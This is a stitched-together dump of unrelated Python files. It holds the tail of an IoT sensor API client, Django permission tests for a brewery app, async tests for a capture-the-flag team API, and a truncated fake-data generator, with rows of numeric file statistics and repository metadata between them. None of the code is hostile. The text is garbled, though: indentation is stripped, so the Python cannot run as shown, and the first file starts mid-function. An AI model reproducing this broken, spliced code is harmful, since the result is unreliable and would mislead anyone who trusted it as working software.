if portia_config.get('debug'):
print('[portia-debug]: {0}'.format(d))
if last == True:
d = pd.DataFrame(
d,
columns=['header_timestamp', 'port', 'dimension_thing_code']
)
d['port'] = d['port'].map(int)
d['dimension_thing_code'] = d['dimension_thing_code'].map(int)
else:
d = list(map(int, d))
return d
else:
raise Exception("couldn't retrieve data")
def device_port_sensors(
portia_config: dict,
edge_id: str,
port: int,
last: bool=False,
params: dict={
'from': None,
'to': None,
'sort': True,
'precision': 'ms',
'timezone': 'Etc/UTC'
}) -> object:
"""Lists a port's sensors.
Arguments:
portia_config {dict} -- Portia's configuration arguments
edge_id {str} -- Edge ID that identifies the device
port {int} -- port of the device
Keyword Arguments:
last {bool} -- if the last package of each port should be returned or
not (default: {False})
params {dict} -- params to send to the service (default:
{{ 'from', 'to', 'sort', 'precision': 'ms',
'timezone': 'Etc/UTC' }})
Returns:
object -- object with the list of sensors
Raises:
Exception -- when the request goes wrong
"""
if last == False:
endpoint = '/describe/device/{0}/port/{1}/sensors' \
.format(edge_id, port)
else:
endpoint = '/describe/device/{0}/port/{1}/sensors/last' \
.format(edge_id, port)
response = utils.http_get_request(portia_config, endpoint, params)
if response.status_code == 200:
d = json.loads(response.text).get('sensors')
if portia_config.get('debug'):
print('[portia-debug]: {0}'.format(d))
if last == True:
d = pd.DataFrame(
d,
columns=[
'header_timestamp',
'sensor',
'dimension_value',
'dimension_code',
'dimension_unity_code',
'dimension_thing_code'
]
)
d['sensor'] = d['sensor'].map(int)
d['dimension_code'] = d['dimension_code'].map(int)
d['dimension_unity_code'] = d['dimension_unity_code'].map(int)
d['dimension_thing_code'] = d['dimension_thing_code'].map(int)
else:
d = list(map(int, d))
return d
else:
raise Exception("couldn't retrieve data")
def device_port_dimensions(
portia_config: dict,
edge_id: str,
port: int,
last: bool=False,
params: dict={
'from': None,
'to': None,
'sort': True,
'precision': 'ms',
'timezone': 'Etc/UTC'
}) -> object:
"""Lists a port's dimensions.
Arguments:
portia_config {dict} -- Portia's configuration arguments
edge_id {str} -- Edge ID that identifies the device
port {int} -- port of the device
Keyword Arguments:
last {bool} -- if the last package of each port should be returned or
not (default: {False})
params {dict} -- params to send to the service (default:
{{ 'from', 'to', 'sort', 'precision': 'ms',
'timezone': 'Etc/UTC' }})
Returns:
object -- object with the list of dimensions
Raises:
Exception -- when the request goes wrong
"""
if last == False:
endpoint = '/describe/device/{0}/port/{1}/dimensions' \
.format(edge_id, port)
else:
endpoint = '/describe/device/{0}/port/{1}/dimensions/last' \
.format(edge_id, port)
response = utils.http_get_request(portia_config, endpoint, params)
if response.status_code == 200:
d = json.loads(response.text).get('dimensions')
if portia_config.get('debug'):
print('[portia-debug]: {0}'.format(d))
if last == True:
d = pd.DataFrame(
d,
columns=[
'header_timestamp',
'dimension_code',
'sensor',
'dimension_thing_code'
]
)
d['sensor'] = d['sensor'].map(int)
d['dimension_code'] = d['dimension_code'].map(int)
d['dimension_thing_code'] = d['dimension_thing_code'].map(int)
else:
d = list(map(int, d))
return d
else:
raise Exception("couldn't retrieve data")
def device_port_sensor_dimensions(
portia_config: dict,
edge_id: str,
port: int,
sensor: int,
last: bool=False,
params: dict={
'from': None,
'to': None,
'sort': True,
'precision': 'ms',
'timezone': 'Etc/UTC'
}) -> object:
"""Lists a sensor's dimensions.
Arguments:
portia_config {dict} -- Portia's configuration arguments
edge_id {str} -- Edge ID that identifies the device
port {int} -- port of the device
sensor {int} -- sensor of the device
Keyword Arguments:
last {bool} -- if the last package of each port should be returned or
not (default: {False})
params {dict} -- params to send to the service (default:
{{ 'from', 'to', 'sort', 'precision': 'ms',
'timezone': 'Etc/UTC' }})
Returns:
object -- object with the list of dimensions
Raises:
Exception -- when the request goes wrong
"""
if last == False:
endpoint = '/describe/device/{0}/port/{1}/sensor/{2}/dimensions' \
.format(edge_id, port, sensor)
else:
endpoint = '/describe/device/{0}/port/{1}/sensor/{2}/dimensions/last' \
.format(edge_id, port, sensor)
response = utils.http_get_request(portia_config, endpoint, params)
if response.status_code == 200:
d = json.loads(response.text).get('dimensions')
if portia_config.get('debug'):
print('[portia-debug]: {0}'.format(d))
if last == True:
d = pd.DataFrame(
d,
columns=[
'header_timestamp',
'dimension_value',
'dimension_code',
'dimension_unity_code',
'dimension_thing_code'
]
)
d['dimension_code'] = d['dimension_code'].map(int)
d['dimension_unity_code'] = d['dimension_unity_code'].map(int)
d['dimension_thing_code'] = d['dimension_thing_code'].map(int)
else:
d = list(map(int, d))
return d
else:
raise Exception("couldn't retrieve data")
| 29.598592
| 79
| 0.521175
| 921
| 8,406
| 4.644951
| 0.111835
| 0.02805
| 0.050491
| 0.041141
| 0.932211
| 0.917017
| 0.906498
| 0.897616
| 0.897616
| 0.870968
| 0
| 0.005875
| 0.35201
| 8,406
| 283
| 80
| 29.70318
| 0.779512
| 0.301213
| 0
| 0.834356
| 0
| 0
| 0.237588
| 0.059216
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02454
| false
| 0
| 0.018405
| 0
| 0.067485
| 0.02454
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5abc7a1139221cf55f84178c698dbfa0b36bb17a
| 15,332
|
py
|
Python
|
brewery/permissions_test.py
|
willjschmitt/joulia-webserver
|
712decb749c2d1bda71af49ecab245378bf30078
|
[
"FTL"
] | null | null | null |
brewery/permissions_test.py
|
willjschmitt/joulia-webserver
|
712decb749c2d1bda71af49ecab245378bf30078
|
[
"FTL"
] | 95
|
2016-08-04T01:59:37.000Z
|
2021-06-10T18:41:46.000Z
|
brewery/permissions_test.py
|
willjschmitt/joulia-webserver
|
712decb749c2d1bda71af49ecab245378bf30078
|
[
"FTL"
] | null | null | null |
"""Tests for the brewery.permissions module."""
from django.contrib.auth.models import Group
from django.contrib.auth.models import User
from django.test import TestCase
from unittest.mock import Mock
from brewery import models
from brewery import permissions
class IsContinuousIntegrationToEditTest(TestCase):
"""Tests for the IsContinuousIntegrationToEdit permissions class."""
# def has_permission(self, request, view):
# if request.method in SAFE_METHODS:
# return True
#
# if not request.user:
# return False
#
# return request.user.group_set.filter(
# name=self._CONTINUOUS_INTEGRATION_GROUP_NAME).exists()
def test_has_permission_with_get(self):
permission = permissions.IsContinuousIntegrationToEdit()
user = User.objects.create(username="user")
request = Mock()
request.user = user
request.method = 'GET'
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_fails_with_no_user(self):
permission = permissions.IsContinuousIntegrationToEdit()
request = Mock()
request.method = 'POST'
request.user = None
view = None
self.assertFalse(permission.has_permission(request, view))
def test_has_permission_fails_with_bad_user(self):
permission = permissions.IsContinuousIntegrationToEdit()
user = User.objects.create(username="user")
group = Group.objects.get(
name=permissions.CONTINUOUS_INTEGRATION_GROUP_NAME)
group.user_set.add(user)
request = Mock()
request.user = user
request.method = 'POST'
view = None
self.assertTrue(permission.has_permission(request, view))
class IsMemberTest(TestCase):
"""Tests for IsMember permissions class."""
def test_has_permission(self):
permission = permissions.IsMember()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
self.assertTrue(permission.has_object_permission(
request, view, brewing_company))
def test_does_not_have_permission(self):
permission = permissions.IsMember()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
self.assertFalse(permission.has_object_permission(
request, view, brewing_company))
class IsMemberOfBrewingCompanyTest(TestCase):
"""Tests for IsMemberOfBrewingCompany permissions class."""
def test_has_permission_safe_method(self):
permission = permissions.IsMemberOfBrewingCompany()
request = Mock()
request.method = "GET"
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_member_of_company(self):
permission = permissions.IsMemberOfBrewingCompany()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
brewing_company = models.BrewingCompany.objects.create(group=group)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"company": brewing_company.pk,
}
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_not_member_of_company(self):
permission = permissions.IsMemberOfBrewingCompany()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
brewing_company = models.BrewingCompany.objects.create(group=group)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"company": brewing_company.pk,
}
view = None
self.assertFalse(permission.has_permission(request, view))
def test_has_object_permission(self):
permission = permissions.IsMemberOfBrewingCompany()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
brewery = models.Brewery(company=brewing_company)
self.assertTrue(permission.has_object_permission(
request, view, brewery))
def test_does_not_have_object_permission(self):
permission = permissions.IsMemberOfBrewingCompany()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
brewery = models.Brewery(company=brewing_company)
self.assertFalse(permission.has_object_permission(
request, view, brewery))
class IsMemberOfBreweryTest(TestCase):
"""Tests for IsMemberOfBrewery permissions class."""
def test_has_permission_safe_method(self):
permission = permissions.IsMemberOfBrewery()
request = Mock()
request.method = "GET"
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_member_of_company(self):
permission = permissions.IsMemberOfBrewery()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
brewing_company = models.BrewingCompany.objects.create(group=group)
brewery = models.Brewery.objects.create(company=brewing_company)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"brewery": brewery.pk,
}
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_not_member_of_company(self):
permission = permissions.IsMemberOfBrewery()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
brewing_company = models.BrewingCompany.objects.create(group=group)
brewery = models.Brewery.objects.create(company=brewing_company)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"brewery": brewery.pk,
}
view = None
self.assertFalse(permission.has_permission(request, view))
def test_has_object_permission(self):
permission = permissions.IsMemberOfBrewery()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
brewery = models.Brewery(company=brewing_company)
brewhouse = models.Brewhouse(brewery=brewery)
self.assertTrue(permission.has_object_permission(
request, view, brewhouse))
def test_does_not_have_object_permission(self):
permission = permissions.IsMemberOfBrewery()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
brewery = models.Brewery(company=brewing_company)
brewhouse = models.Brewhouse(brewery=brewery)
self.assertFalse(permission.has_object_permission(
request, view, brewhouse))
class OwnsRecipeTest(TestCase):
"""Tests for OwnsRecipe permissions class."""
def test_has_permission_safe_method(self):
permission = permissions.OwnsRecipe()
request = Mock()
request.method = "GET"
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_member_of_company(self):
permission = permissions.OwnsRecipe()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
brewing_company = models.BrewingCompany.objects.create(group=group)
recipe = models.Recipe.objects.create(company=brewing_company)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"recipe": recipe.pk,
}
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_not_member_of_company(self):
permission = permissions.OwnsRecipe()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
brewing_company = models.BrewingCompany.objects.create(group=group)
recipe = models.Recipe.objects.create(company=brewing_company)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"recipe": recipe.pk,
}
view = None
self.assertFalse(permission.has_permission(request, view))
def test_has_permission(self):
permission = permissions.OwnsRecipe()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
recipe = models.Recipe(company=brewing_company)
recipe_instance = models.RecipeInstance(recipe=recipe)
self.assertTrue(permission.has_object_permission(
request, view, recipe_instance))
def test_does_not_have_permission(self):
permission = permissions.OwnsRecipe()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
recipe = models.Recipe(company=brewing_company)
recipe_instance = models.RecipeInstance(recipe=recipe)
self.assertFalse(permission.has_object_permission(
request, view, recipe_instance))
class OwnsSensorTest(TestCase):
"""Tests for OwnsSensor permissions class."""
def test_has_permission_safe_method(self):
permission = permissions.OwnsSensor()
request = Mock()
request.method = "GET"
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_member_of_company(self):
permission = permissions.OwnsSensor()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
brewing_company = models.BrewingCompany.objects.create(group=group)
brewery = models.Brewery.objects.create(company=brewing_company)
brewhouse = models.Brewhouse.objects.create(brewery=brewery)
sensor = models.AssetSensor.objects.create(brewhouse=brewhouse)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"sensor": sensor.pk,
}
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_not_member_of_company(self):
permission = permissions.OwnsSensor()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
brewing_company = models.BrewingCompany.objects.create(group=group)
brewery = models.Brewery.objects.create(company=brewing_company)
brewhouse = models.Brewhouse.objects.create(brewery=brewery)
sensor = models.AssetSensor.objects.create(brewhouse=brewhouse)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"sensor": sensor.pk,
}
view = None
self.assertFalse(permission.has_permission(request, view))
def test_has_permission(self):
permission = permissions.OwnsSensor()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany.objects.create(group=group)
brewery = models.Brewery.objects.create(company=brewing_company)
brewhouse = models.Brewhouse.objects.create(brewery=brewery)
recipe = models.Recipe.objects.create(company=brewing_company)
recipe_instance = models.RecipeInstance.objects.create(recipe=recipe)
sensor = models.AssetSensor.objects.create(brewhouse=brewhouse)
data_point = models.TimeSeriesDataPoint.objects.create(
sensor=sensor, recipe_instance=recipe_instance)
self.assertTrue(permission.has_object_permission(
request, view, data_point))
def test_does_not_have_permission(self):
permission = permissions.OwnsSensor()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany.objects.create(group=group)
brewery = models.Brewery.objects.create(company=brewing_company)
brewhouse = models.Brewhouse.objects.create(brewery=brewery)
recipe = models.Recipe.objects.create(company=brewing_company)
recipe_instance = models.RecipeInstance.objects.create(recipe=recipe)
sensor = models.AssetSensor.objects.create(brewhouse=brewhouse)
data_point = models.TimeSeriesDataPoint.objects.create(
sensor=sensor, recipe_instance=recipe_instance)
self.assertFalse(permission.has_object_permission(
request, view, data_point))
class IsMemberOfBrewingCompanyFunctionTest(TestCase):
"""Tests for is_member_of_brewing_company function."""
def test_is_member(self):
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
brewing_company = models.BrewingCompany(group=group)
self.assertTrue(permissions.is_member_of_brewing_company(
user, brewing_company))
def test_is_not_member(self):
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
brewing_company = models.BrewingCompany(group=group)
self.assertFalse(permissions.is_member_of_brewing_company(
user, brewing_company))
def test_no_group(self):
user = User.objects.create(username="user")
brewing_company = models.BrewingCompany()
self.assertFalse(permissions.is_member_of_brewing_company(
user, brewing_company))
| 38.717172
| 77
| 0.66821
| 1,592
| 15,332
| 6.280151
| 0.05402
| 0.09752
| 0.062513
| 0.04831
| 0.904481
| 0.892479
| 0.884277
| 0.876375
| 0.810762
| 0.79806
| 0
| 0
| 0.233629
| 15,332
| 396
| 78
| 38.717172
| 0.850894
| 0.040699
| 0
| 0.89939
| 0
| 0
| 0.020396
| 0
| 0
| 0
| 0
| 0
| 0.085366
| 1
| 0.085366
| false
| 0
| 0.018293
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
85212b344249cdefa8bdd8b1153ec61c2aa01b88
| 15,539
|
py
|
Python
|
tests/test_team.py
|
nnonchev/CTFe
|
b4814e08593ec68b7befec8d07169a08a1ddec10
|
[
"MIT"
] | null | null | null |
tests/test_team.py
|
nnonchev/CTFe
|
b4814e08593ec68b7befec8d07169a08a1ddec10
|
[
"MIT"
] | null | null | null |
tests/test_team.py
|
nnonchev/CTFe
|
b4814e08593ec68b7befec8d07169a08a1ddec10
|
[
"MIT"
] | null | null | null |
import pytest
from httpx import AsyncClient
from CTFe.main import app
from CTFe.models import (
Team,
User,
)
from CTFe.schemas import team_schemas
from CTFe.utils import enums
from CTFe.config import constants
from . import (
dal,
BASE_URL,
)
# Create team tests
# ------------------
@pytest.mark.asyncio
async def test_create_team__already_exists():
team_data = {
"name": "team1",
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.post("/teams/", json=team_data)
assert response.status_code == 409
assert response.json() == {
"detail": f"The name: { team_data['name'] } is already taken"}
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
@pytest.mark.asyncio
async def test_create_team__success():
team_data = {
"name": "team1",
}
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.post("/teams/", json=team_data)
assert response.status_code == 200
assert "id" in response.json().keys()
assert ("name", team_data["name"]) in response.json().items()
with dal.get_session_ctx() as session:
id = response.json()["id"]
db_team = session.query(Team).filter(Team.id == id).first()
session.delete(db_team)
session.commit()
# Get team tests
# ---------------
@pytest.mark.asyncio
async def test_get_team__not_found():
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.get("/teams/-1")
assert response.status_code == 404
assert response.json() == {"detail": "Team not found"}
@pytest.mark.asyncio
async def test_get_team__success():
team_data = {
"name": "team1",
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
team_details = team_schemas.Details.from_orm(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.get(f"/teams/{db_team.id}")
assert response.status_code == 200
assert response.json() == team_details
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
@pytest.mark.asyncio
async def test_get_team_by_name__not_found():
name = "team1"
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.get(f"/teams/name/{name}")
assert response.status_code == 404
assert response.json() == {"detail": "Team not found"}
@pytest.mark.asyncio
async def test_get_team_by_bane__success():
team_data = {
"name": "team1",
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
team_details = team_schemas.Details.from_orm(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.get(f"/teams/name/{db_team.name}")
assert response.status_code == 200
assert response.json() == team_details
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
@pytest.mark.asyncio
async def test_get_all_teams__success():
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.get("/teams/")
assert response.status_code == 200
assert response.json() == []
# Update team tests
# ------------------
@pytest.mark.asyncio
async def test_update_team__not_found():
team_data = {}
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.put(f"/teams/-1", json=team_data)
assert response.status_code == 404
assert response.json() == {"detail": "Team not found"}
@pytest.mark.asyncio
async def test_update_team__success():
team_data = {
"name": "team old",
}
new_team_data = {
"name": "team new",
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.put(f"/teams/{db_team.id}", json=new_team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.refresh(db_team)
team_details = team_schemas.Details.from_orm(db_team)
team_details = team_details
assert response.status_code == 200
assert response.json() == team_details
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
# Add players to team tests
# --------------------------
@pytest.mark.asyncio
async def test_update_add_player_to_team__team_not_found():
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.delete(f"/teams/-1")
assert response.status_code == 404
assert response.json() == {"detail": "Team not found"}
@pytest.mark.asyncio
async def test_add_player_to_team__team_not_found():
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/-1/add-player/1")
assert response.status_code == 404
assert response.json() == {"detail": "Team not found"}
@pytest.mark.asyncio
async def test_add_player_to_team__max_member_number_excceded():
original_val = constants.MAX_TEAM_MEMBERS
constants.MAX_TEAM_MEMBERS = 1
users_data = [
{
"username": "user1",
"password": "secret",
},
{
"username": "user2",
"password": "secret",
}
]
team_data = {
"name": "team 1",
}
db_team = Team(**team_data)
db_user1 = User(**users_data[0])
db_user2 = User(**users_data[1])
db_team.players.append(db_user1)
with dal.get_session_ctx() as session:
session.add(db_team)
session.add(db_user1)
session.add(db_user2)
session.commit()
session.refresh(db_team)
session.refresh(db_user1)
session.refresh(db_user2)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/add-player/{db_user2.id}")
assert response.status_code == 403
assert response.json() == {
"detail": "The team already has the maximum number of members in it"}
with dal.get_session_ctx() as session:
session.delete(db_team)
session.delete(db_user1)
session.delete(db_user2)
session.commit()
constants.MAX_TEAM_MEMBERS = original_val
@pytest.mark.asyncio
async def test_add_player_to_team__player_not_found():
team_data = {
"name": "team 1",
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/add-player/-1")
assert response.status_code == 404
assert response.json() == {"detail": "Player not found"}
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
@pytest.mark.asyncio
async def test_add_player_to_team__wrong_user_type():
user_data = {
"username": "user1",
"password": "secret",
}
team_data = {
"name": "team 1",
}
db_team = Team(**team_data)
db_user = User(**user_data)
db_user.user_type = enums.UserType.ADMIN
with dal.get_session_ctx() as session:
session.add(db_team)
session.add(db_user)
session.commit()
session.refresh(db_team)
session.refresh(db_user)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/add-player/{db_user.id}")
assert response.status_code == 403
assert response.json() == {
"detail": f"Only players can be part of teams. { db_user } has user_type: { db_user.user_type }"}
with dal.get_session_ctx() as session:
session.delete(db_team)
session.delete(db_user)
session.commit()
@pytest.mark.asyncio
async def test_add_player_to_team__player_already_in_team():
user_data = {
"username": "user1",
"password": "secret",
}
teams_data = [
{
"name": "team 1",
},
{
"name": "team 2",
},
]
db_team1 = Team(**teams_data[0])
db_team2 = Team(**teams_data[1])
db_user = User(**user_data)
db_team1.players.append(db_user)
with dal.get_session_ctx() as session:
session.add(db_team1)
session.add(db_team2)
session.add(db_user)
session.commit()
session.refresh(db_team1)
session.refresh(db_team2)
session.refresh(db_user)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team1.id}/add-player/{db_user.id}")
assert response.status_code == 403
assert response.json() == {
"detail": f"Player { db_user } is already part of a team"}
with dal.get_session_ctx() as session:
session.delete(db_team1)
session.delete(db_team2)
session.delete(db_user)
session.commit()
@pytest.mark.asyncio
async def test_add_player_to_team__success():
users_data = [
{
"username": "user1",
"password": "secret",
},
{
"username": "user2",
"password": "secret",
}
]
team_data = {
"name": "team 1",
}
db_team = Team(**team_data)
db_user1 = User(**users_data[0])
db_user2 = User(**users_data[1])
db_team.players.append(db_user1)
with dal.get_session_ctx() as session:
session.add(db_team)
session.add(db_user1)
session.add(db_user2)
session.commit()
session.refresh(db_team)
session.refresh(db_user1)
session.refresh(db_user2)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/add-player/{db_user2.id}")
with dal.get_session_ctx() as session:
session.add(db_team)
session.refresh(db_team)
team_details = team_schemas.Details.from_orm(db_team)
assert response.status_code == 200
assert response.json() == team_details
with dal.get_session_ctx() as session:
session.delete(db_team)
session.delete(db_user1)
session.delete(db_user2)
session.commit()
# Remove players to team tests
# --------------------------
@pytest.mark.asyncio
async def test_remove_player_from_team__team_not_found():
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/-1/remove-player/1")
assert response.status_code == 404
assert response.json() == {"detail": "Team not found"}
@pytest.mark.asyncio
async def test_remove_player_to_team__player_not_found():
team_data = {
"name": "team 1"
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/remove-player/-1")
assert response.status_code == 404
assert response.json() == {"detail": "Player not found"}
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
@pytest.mark.asyncio
async def test_remove_player_to_team__player_not_found():
team_data = {
"name": "team 1",
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/remove-player/-1")
assert response.status_code == 404
assert response.json() == {"detail": "Player not found"}
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
@pytest.mark.asyncio
async def test_remove_player_to_team__player_not_part_of_the_team():
team_data = {
"name": "team 1",
}
user_data = {
"username": "user1",
"password": "secret",
}
db_team = Team(**team_data)
db_user = User(**user_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.add(db_user)
session.commit()
session.refresh(db_team)
session.refresh(db_user)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/remove-player/{db_user.id}")
assert response.status_code == 403
assert response.json() == {
"detail": f"Player { db_user } is not part of this team"}
with dal.get_session_ctx() as session:
session.delete(db_team)
session.delete(db_user)
session.commit()
@pytest.mark.asyncio
async def test_remove_player_to_team__success():
user_data = {
"username": "user1",
"password": "secret",
}
team_data = {
"name": "team 1",
}
db_team = Team(**team_data)
db_user = User(**user_data)
db_team.players.append(db_user)
with dal.get_session_ctx() as session:
session.add(db_team)
session.add(db_user)
session.commit()
session.refresh(db_team)
session.refresh(db_user)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/remove-player/{db_user.id}")
with dal.get_session_ctx() as session:
session.add(db_team)
session.refresh(db_team)
team_details = team_schemas.Details.from_orm(db_team)
assert response.status_code == 200
assert response.json() == team_details
with dal.get_session_ctx() as session:
session.delete(db_team)
session.delete(db_user)
session.commit()
# Delete team tests
# ------------------
@pytest.mark.asyncio
async def test_delete_team__not_found():
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.delete(f"/teams/-1")
assert response.status_code == 404
assert response.json() == {"detail": "Team not found"}
@pytest.mark.asyncio
async def test_delete_team__success():
team_data = {
"name": "team1",
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.delete(f"/teams/{db_team.id}")
assert response.status_code == 204
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
| 25.557566
| 105
| 0.639681
| 2,070
| 15,539
| 4.555072
| 0.056039
| 0.050907
| 0.049634
| 0.057694
| 0.896702
| 0.88652
| 0.871036
| 0.866688
| 0.843356
| 0.82819
| 0
| 0.011841
| 0.23367
| 15,539
| 607
| 106
| 25.599671
| 0.77998
| 0.016089
| 0
| 0.724057
| 0
| 0
| 0.097473
| 0.029131
| 0
| 0
| 0
| 0
| 0.108491
| 1
| 0
| false
| 0.018868
| 0.018868
| 0
| 0.018868
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5175ddbc65e54f0b33828dc97e8934264a72e1d5
| 2,364
|
py
|
Python
|
employment_agent/fakers.py
|
ifelsegrandmaster/brithmasoft
|
7e5e514bc4b9dd183470591cce29d5350c0ae25e
|
[
"MIT"
] | null | null | null |
employment_agent/fakers.py
|
ifelsegrandmaster/brithmasoft
|
7e5e514bc4b9dd183470591cce29d5350c0ae25e
|
[
"MIT"
] | null | null | null |
employment_agent/fakers.py
|
ifelsegrandmaster/brithmasoft
|
7e5e514bc4b9dd183470591cce29d5350c0ae25e
|
[
"MIT"
] | null | null | null |
from faker import Faker
from .models import Employer, JobSeeker
import uuid
class EmployerFaker:
def __init__(self, count):
fake = Faker()
first_names = [fake.unique.first_name() for i in range(count)]
last_names = [fake.unique.last_name() for i in range(count)]
phone_numbers = [fake.unique.phone_number() for i in range(count)]
addresses = [fake.unique.address() for i in range(count)]
emails = [fake.unique.email() for i in range(count)]
job_titles = [fake.unique.sentence() for i in range(count)]
